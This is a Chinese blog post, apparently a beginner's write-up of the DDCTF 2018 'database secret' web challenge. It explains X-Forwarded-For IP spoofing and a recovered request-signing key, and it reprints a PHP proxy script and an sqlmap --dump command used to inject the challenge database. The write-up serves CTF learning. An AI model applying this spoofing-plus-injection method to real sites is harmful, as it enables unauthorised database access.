<!doctype html>



  


<html class="theme-next mist use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">
<style>
    .pace .pace-progress {
        background: #1E92FB; /*进度条颜色*/
        height: 1px;
    }
    .pace .pace-progress-inner {
         box-shadow: 0 0 10px #1E92FB, 0 0 5px     #1E92FB; /*阴影颜色*/
    }
    .pace .pace-activity {
        border-top-color: #1E92FB;    /*上边框颜色*/
        border-left-color: #1E92FB;    /*左边框颜色*/
    }
</style>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>



  <meta name="google-site-verification" content="p9ZQcLlzhS3CvgOzUqxYASnD-7EbtZe4qW16dXC2Bjc" />










  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="CTF," />





  <link rel="alternate" href="/atom.xml" title="暗门's Blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="万丈红尘静驻于茫茫人海看世事繁华嘈杂喧嚣心却孤零   　　 　　 前辈推荐了DDCTF的2018writeup，觉得有必要跟进了解一下。如果有兴趣的也可以去了解一下。">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="DDCTF-2018-writeup">
<meta property="og:url" content="http://blog.darknessdoor.com/2018/05/24/DDCTF-2018 -writeup/index.html">
<meta property="og:site_name" content="暗门&#39;s Blog">
<meta property="og:description" content="万丈红尘静驻于茫茫人海看世事繁华嘈杂喧嚣心却孤零   　　 　　 前辈推荐了DDCTF的2018writeup，觉得有必要跟进了解一下。如果有兴趣的也可以去了解一下。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-1.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-2.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-3.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-4.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-5.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-6.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-7.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-8.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-9.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-10.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-11.png">
<meta property="og:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-12.png">
<meta property="og:updated_time" content="2018-05-24T13:57:17.780Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="DDCTF-2018-writeup">
<meta name="twitter:description" content="万丈红尘静驻于茫茫人海看世事繁华嘈杂喧嚣心却孤零   　　 　　 前辈推荐了DDCTF的2018writeup，觉得有必要跟进了解一下。如果有兴趣的也可以去了解一下。">
<meta name="twitter:image" content="http://blog.darknessdoor.com/upload_image/20180524/ctf-web-1.png">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: undefined,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://blog.darknessdoor.com/2018/05/24/DDCTF-2018 -writeup/"/>

  <title> DDCTF-2018-writeup | 暗门's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?d22cd975ccc2d560e0a480fec5629325";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">暗门's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">那一年我遇见了你.......</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-count">
          <a href="/count" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            达客阁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-collect_url">
          <a href="/SecWeb" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            导航集合
          </a>
        </li>
      
        
        <li class="menu-item menu-item-message">
          <a href="/message" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            留言
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-money">
          <a href="/money" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            资助本站
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup">
 <span class="search-icon fa fa-search"></span>
 <input type="text" id="local-search-input">
 <div id="local-search-result"></div>
 <span class="popup-btn-close">close</span>
</div>


    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                DDCTF-2018-writeup
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2018-05-24T11:20:00+08:00" content="2018-05-24">
              2018-05-24
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
          

          

          
          
             <span id="/2018/05/24/DDCTF-2018 -writeup/" class="leancloud_visitors" data-flag-title="DDCTF-2018-writeup">
               &nbsp; | &nbsp;
			   <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               <span class="post-meta-item-text">热度</span>
               <span class="leancloud-visitors-count"></span>
               <span>℃</span>
              </span>
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote class="blockquote-center">万丈红尘<br>静驻于茫茫人海<br>看世事繁华<br>嘈杂喧嚣<br>心却孤零</blockquote>


<p>　　
　　</p>
<p>前辈推荐了DDCTF的2018writeup，觉得有必要跟进了解一下。如果有兴趣的也可以去了解一下。<br><a id="more"></a></p>
<h3 id="DDCTF-2018-writeup"><a href="#DDCTF-2018-writeup" class="headerlink" title="DDCTF 2018 writeup"></a>DDCTF 2018 writeup</h3><p>我想这里我就不多介绍怎么什么是CTF了，黑客夺旗大赛嘛…相信各位能够看到我博客都有了一定的基础能力的。<br>因为我个人有兴趣的是web，所以接下来我就可能去根据web进行一系列解释了，关于其他层面的可能会去做做，希望能够记笔记吧。</p>
<h3 id="Web题"><a href="#Web题" class="headerlink" title="Web题"></a>Web题</h3><p>个人比较喜欢web题目，所以先玩web题目，不喜勿怪啊。</p>
<h4 id="第一题-数据库的秘密-（100分）"><a href="#第一题-数据库的秘密-（100分）" class="headerlink" title="第一题 数据库的秘密 （100分）"></a>第一题 数据库的秘密 （100分）</h4><p><img src="/upload_image/20180524/ctf-web-1.png" alt=""><br>就是这个题目，点进去首先看下提示。<br><img src="/upload_image/20180524/ctf-web-2.png" alt=""><br>好像没啥提示，就是说了个数据库的秘密…到底有啥秘密还得点进去那个网址具体看看。</p>
<p>说实话，点进去这个网址的一瞬间我是有点懵逼的。这是啥？？？乱码吗？这跟….数据有个啥关系啊…？也不显示什么数据的参数传递啊。<br><img src="/upload_image/20180524/ctf-web-3.png" alt=""></p>
<p>说实话，没想到一瞬间第一题就跪了…真心是有点丢人的啊…<br>没办法，去看大佬们也就是赛棍写的文章去了。<br>大佬上面说的这第一题打开题目是限制ip访问，反正是乱码…我说啥也没看出来。限制ip，或者不限制ip访问的。等等，且让我此处换个浏览器试试。<br>果不其然..换个浏览器就能看出来是有提示的了。我敲…我真的是此刻非常的无语。上图…chrome浏览器就能完美的显示，我估计是我那个浏览器编码问题。<br><img src="/upload_image/20180524/ctf-web-4.png" alt=""></p>
<p>上面显示的是只准123.232.23.245，那么这句话透露出的信息，就是我得把我自己伪造成这个ip，或者在他接受我传输过去的信息的时候，得让他以为我是123.232.23.245，感觉自己说了句废话。</p>
<p>讲真的，说实话，我真的对于伪造ip几乎就没有了解过，平常挂个代理以为就是伪造ip了，事实上根本就不是的。<br>在一篇大佬的文章中题到了这个词语：通过X-Forwarded-For来伪造ip。<br>说实话，没接触过，所以特地现在去接触看看，百度百度一下，看下到底是什么东西。<br>此处放下，我拜读的X-Forwarded-For的链接：<a href="https://www.jianshu.com/p/98c08956183d" target="_blank" rel="external">X-Forwarded-For</a><br>这是个大神，对我现阶段来说，他是个大神级别的人物。<br>可惜啊，这位大神对我的技术过于高估了点…好吧，其实是自己懒得用代码打的，我记得火狐里面好像有一款类似的插件。我去找下。<br>这里我也放上我找到的那款伪造头的工具链接，跟我一样不懂的小白，看下这个链接：<a href="https://jingyan.baidu.com/article/ca41422fc5fd481eae99ed30.html" target="_blank" rel="external">Modify Headers</a></p>
<p>嗯，然后我开始安装这个插件了。下图就是这个插件<br><img src="/upload_image/20180524/ctf-web-5.png" alt=""><br>好的…失败了…我个人还是建议换个工具吧…这个工具跟我很多年用的时候变了…变得不是特别好用了…话说…实在不行。不如我自己写个代码算了。</p>
<p>算了，懒得懒得，去打代码了，大家如下图，跟我找这款工具吧…我是测试过了..是可以用的。<br><img src="/upload_image/20180524/ctf-web-6.png" alt=""></p>
<p>然后设置设置成下图这样，刷新一下即可进入了。<br><img src="/upload_image/20180524/ctf-web-7.png" alt=""></p>
<p>进入的界面是这样的，请看下图。<br><img src="/upload_image/20180524/ctf-web-8.png" alt=""></p>
<p>然后各位进入这个页面请不要看我接下来的内容，自己尝试看看能不能发现问题<br>比如我随手输入了个3发现网址的链接变成懒得这个样子</p>
<pre><code>http://116.85.43.88:8080/ZVDHKBUVUZSTJCNX/dfe3ia/index.php?sig=97b3ced7c86ad314a7e6db92f7fcb53fe2d222c2&time=1527167126</code></pre>

<p>很明显你会发现sig后面传递了个值同时time也传递了个值。尝试对后面的值就行随意的修改试试看。<br>好的，无论删减还是进行个添加均没有太大的用处，你会发现页面返回正常。然后接下来接着进行一点点的分析。<br>这个时候你当然要点开发者工具，也就是F12键…我就没见过没人不点的…养成习惯就好了。<br>这时候注意我下面的这幅图。非常的重要…在ctf中碰见key啊，或者什么flag这些字段啊，一定要十分的注意…如果忽略了，那么恭喜你，凉凉吧。<br>当然也有不是在这儿的…我这仅仅是猜测啊…对不队你们得自己去一个个去派出去搜寻。话说，第一题出这么难做什么…很是悲伤啊。<br><img src="/upload_image/20180524/ctf-web-9.png" alt=""><br>对不起，这里啪啪打脸..好像var key就是个转义字符而已…脸感觉已经通红。<br>接着往下。<br>你会看见引入的两个js文件以及底下一队东西，底下的一堆东西搜寻完，啥都没收获，只能进入js文件了。<br>进了math.js你会发现其实里面并没有什么东西，而且还排列的非常整齐。（等等你们就知道我为什么要强调整齐了）。</p>
<p>于是我出来了，进了另一个main.js,好的，丧心病狂的正式开始了。放图。<br><img src="/upload_image/20180524/ctf-web-10.png" alt=""><br>越是这种情况，越是证明他有鬼…至少我每次遇到这种题目是自我这么安慰的。<br>实话实说…我是彻底没看懂他是在干嘛的。这时候去看大牛的文章，发现他对这段js进行了一个整理。卧槽…真心牛逼加无敌啊。<br>这里我下方放上大牛对这段代码的整理。</p>
<pre><code>
// key 位于主页 JS 中，此处不再单独截图。内容是 adrefkfweodfsdpiru
var key="141144162145146153146167145157144146163144160151162165" 
function signGenerate(obj, key) {
    var str0 = '';
    for (i in obj) {
        if (i != 'sign') {
            str1 = '';
            str1 = i + '=' + obj[i];
            str0 += str1
        }
    }
    return hex_math_enc(str0 + key)
};
var obj = {
    id: '',
    title: '',
    author: '',
    date: '',
    time: parseInt(new Date().getTime() / 1000)
};
function submitt() {
    obj['id'] = document.getElementById('id').value;
    obj['title'] = document.getElementById('title').value;
    obj['author'] = document.getElementById('author').value;
    obj['date'] = document.getElementById('date').value;
    var sign = signGenerate(obj, key);
    document.getElementById('queryForm').action = "index.php?sig=" + sign + "&time=" + obj.time;
    document.getElementById('queryForm').submit()
}
</code></pre>

<p>有兴趣有毅力的童鞋大佬可以坚持整理下。然后在我底下留言告诉我您是怎么整理出来的。<br>然后你会发现上面的这段js代码中，位特定的字符串凭借后的SHA1，构造的方式是<code>id=title=author=date=time=adrefkfweodfsdpiru</code><br>然后我们在返回主页面，其实刚才我太粗心了点。在查看源代码的时候没发现这个input标签的type是hidden属性。以后一定要仔细。下图，打红色箭头的。<br><img src="/upload_image/20180524/ctf-web-11.png" alt=""></p>
<p>然后肯定就是要针对author=1进行一些姿势，到了这里呢，我开始就有点不太会了。讲真的，完全不造第一题出这么难是要干吗。第一题这么难，后面的题目大家都凉凉了呀。<br>然后看了两位大佬的方法，都其实挺不错的…但都要自己构造脚本或者仿写本地文件。（讲真，我流下了，没有技术的泪水。）</p>
<h5 id="a-采用了使用-PHP-编写代理页面的方式"><a href="#a-采用了使用-PHP-编写代理页面的方式" class="headerlink" title="a.采用了使用 PHP 编写代理页面的方式"></a>a.采用了使用 PHP 编写代理页面的方式</h5><p>这位大佬采用了了采用了使用 PHP 编写代理页面的方式，对请求进行了代理并签名。之后使用 sqlmap 等通用工具对该 PHP 页面进行注入即可。（即可…说的好像很容易似的。）<br>命名一个proxy.php  对其中写入如下的代码。</p>
<pre><code>
                <?php
                @$id = $_REQUEST['id'];
                @$title = $_REQUEST['title'];
                @$author = $_REQUEST['author'];
                @$date = $_REQUEST['date'];
                $time = time();
                $sig = sha1('id='.$id.'title='.$title.'author='.$author.'date='.$date.'time='.$time.'adrefkfweodfsdpiru');
                $ch = curl_init();
                $post = [
                    'id' => $id,
                    'title' => $title,
                    'author' => $author,
                    'date' => $date,
                ];
                curl_setopt($ch, CURLOPT_URL,"http://116.85.43.88:8080/KREKGJVFPYQKERQR/dfe3ia/index.php?sig=$sig&time=$time");
                curl_setopt($ch, CURLOPT_HTTPHEADER, array(
                    'X-Forwarded-For: 123.232.23.245',
                    ));
                curl_setopt($ch, CURLOPT_POST, 1);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_HEADER, true);
                $ch_out = curl_exec($ch);
                $ch_info = curl_getinfo($ch);
                $header = substr($ch_out, 0, $ch_info['header_size']);
                $body = substr($ch_out, $ch_info['header_size']);
                http_response_code($ch_info['http_code']);
                //header($header);
                //echo $header;
                echo $body;
                </code></pre>
之后通过对本地的这个php页面进行一个slqmap注入。说实话我很好奇，他是怎么知道的这个注入点的。后来释然了。这道题的提示是数据库的秘密，你肯定得进去数据库，只能注入了..


sqlmap注入命令如下
<pre><code>
sqlmap.py -u 'http://127.0.0.1/proxy.php?author=admin' --dump 
</code></pre>

<p>从大佬这盗了一张图。<br><img src="/upload_image/20180524/ctf-web-12.png" alt=""><br>能够明显的看到这个flag已经获取到了。</p>
<p>接下来讲看到的第二个方法。感觉这个方法，我还是能够学会的。估计也够呛了。</p>
<h5 id="b-burp构造脚本发送"><a href="#b-burp构造脚本发送" class="headerlink" title="b.burp构造脚本发送"></a>b.burp构造脚本发送</h5><p>更新中</p>

      
    </div>

    <div>
      
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

  <!-- JS库 sweetalert 可修改路径 -->
  <script type="text/javascript" src="http://jslibs.wuxubj.cn/sweetalert_mini/jquery-1.7.1.min.js"></script>
  <script src="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.min.js"></script>
  <link rel="stylesheet" type="text/css" href="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.mini.css">
  <p><span>本文标题:</span><a href="/2018/05/24/DDCTF-2018 -writeup/">DDCTF-2018-writeup</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 暗门 的个人博客">暗门</a></p>
  <p><span>发布时间:</span>2018年05月24日 - 11:05</p>
  <p><span>最后更新:</span>2018年05月24日 - 21:05</p>
  <p><span>原始链接:</span><a href="/2018/05/24/DDCTF-2018 -writeup/" title="DDCTF-2018-writeup">http://blog.darknessdoor.com/2018/05/24/DDCTF-2018 -writeup/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://blog.darknessdoor.com/2018/05/24/DDCTF-2018 -writeup/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    clipboard.on('success', $(function(){
      $(".fa-clipboard").click(function(){
        swal({   
          title: "",   
          text: '复制成功',   
          html: false,
          timer: 500,   
          showConfirmButton: false
        });
      });
    }));  
</script>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i>CTF</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/05/24/docker的入坑历史/" rel="next" title="docker的入坑史">
                <i class="fa fa-chevron-left"></i> docker的入坑史
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yNzk2Ny80NTQ0">
      </div>
  
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/uploads/avatar.png"
               alt="暗门" />
          <p class="site-author-name" itemprop="name">暗门</p>
          <p class="site-description motion-element" itemprop="description">不会开黑的厨师</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">5</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">5</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://github.com/skydarker" rel="external nofollow" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/u/5659779955" rel="external nofollow" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://#" rel="external nofollow" target="_blank" title="暂无">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  暂无
                </a>
              </span>
            
          
        </div>

        
        
          <div class="cc-license motion-element" itemprop="license">
            <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" target="_blank" rel="external nofollow">
              <img src="/images/cc-by-nc-sa.svg" alt="Creative Commons" />
            </a>
          </div>
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://weibo.com/u/5659779955" title="暗门实验室（微博）" target="_blank">暗门实验室（微博）</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://invom.cc/" title="invom's blog（友人）" target="_blank">invom's blog（友人）</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://ub3r.cn/" title="UB3R" target="_blank">UB3R</a>
                </li>
              
            </ul>
          </div>
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#DDCTF-2018-writeup"><span class="nav-number">1.</span> <span class="nav-text">DDCTF 2018 writeup</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Web题"><span class="nav-number">2.</span> <span class="nav-text">Web题</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#第一题-数据库的秘密-（100分）"><span class="nav-number">2.1.</span> <span class="nav-text">第一题 数据库的秘密 （100分）</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#a-采用了使用-PHP-编写代理页面的方式"><span class="nav-number">2.1.1.</span> <span class="nav-text">a.采用了使用 PHP 编写代理页面的方式</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#b-burp构造脚本发送"><span class="nav-number">2.1.2.</span> <span class="nav-text">b.burp构造脚本发送</span></a></li></ol></li></ol></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">暗门</span>
</div>

<!--
<div class="powered-by">
  Power <a class="theme-link" rel="external nofollow" href="https://hexo.io">Hexo</a>
</div>

<div class="theme-info">
  Theme -
  <a class="theme-link" rel="external nofollow" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>
-->

        

<div class="busuanzi-count">

  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">本站访客数<i class="fa fa-user"></i><span class="busuanzi-value" id="busuanzi_value_site_uv"></span>人次</span>
  

  
    <span class="site-pv">本站总访问量<i class="fa fa-eye"></i><span class="busuanzi-value" id="busuanzi_value_site_pv"></span>次</span>
  
  
</div>



        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  



  




  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  



  


  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
       search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body").append('<div class="popoverlay">').css('overflow', 'hidden');
      $('.popup').toggle();

    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
    'use strict';
    $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
            // get the contents from search data
            isfetched = true;
            $('.popup').detach().appendTo('.header-inner');
            var datas = $( "entry", xmlResponse ).map(function() {
                return {
                    title: $( "title", this ).text(),
                    content: $("content",this).text(),
                    url: $( "url" , this).text()
                };
            }).get();
            var $input = document.getElementById(search_id);
            var $resultContent = document.getElementById(content_id);
            $input.addEventListener('input', function(){
                var matchcounts = 0;
                var str='<ul class=\"search-result-list\">';
                var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                $resultContent.innerHTML = "";
                if (this.value.trim().length > 1) {
                // perform local searching
                datas.forEach(function(data) {
                    var isMatch = true;
                    var content_index = [];
                    var data_title = data.title.trim().toLowerCase();
                    var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                    var data_url = data.url;
                    var index_title = -1;
                    var index_content = -1;
                    var first_occur = -1;
                    // only match artiles with not empty titles and contents
                    if(data_title != '' && data_content != '') {
                        keywords.forEach(function(keyword, i) {
                            index_title = data_title.indexOf(keyword);
                            index_content = data_content.indexOf(keyword);
                            if( index_title < 0 && index_content < 0 ){
                                isMatch = false;
                            } else {
                                if (index_content < 0) {
                                    index_content = 0;
                                }
                                if (i == 0) {
                                    first_occur = index_content;
                                }
                            }
                        });
                    }
                    // show search results
                    if (isMatch) {
                        matchcounts += 1;
                        str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                        var content = data.content.trim().replace(/<[^>]+>/g,"");
                        if (first_occur >= 0) {
                            // cut out 100 characters
                            var start = first_occur - 20;
                            var end = first_occur + 80;
                            if(start < 0){
                                start = 0;
                            }
                            if(start == 0){
                                end = 50;
                            }
                            if(end > content.length){
                                end = content.length;
                            }
                            var match_content = content.substring(start, end);
                            // highlight all keywords
                            keywords.forEach(function(keyword){
                                var regS = new RegExp(keyword, "gi");
                                match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                            });

                            str += "<p class=\"search-result\">" + match_content +"...</p>"
                        }
                        str += "</li>";
                    }
                })};
                str += "</ul>";
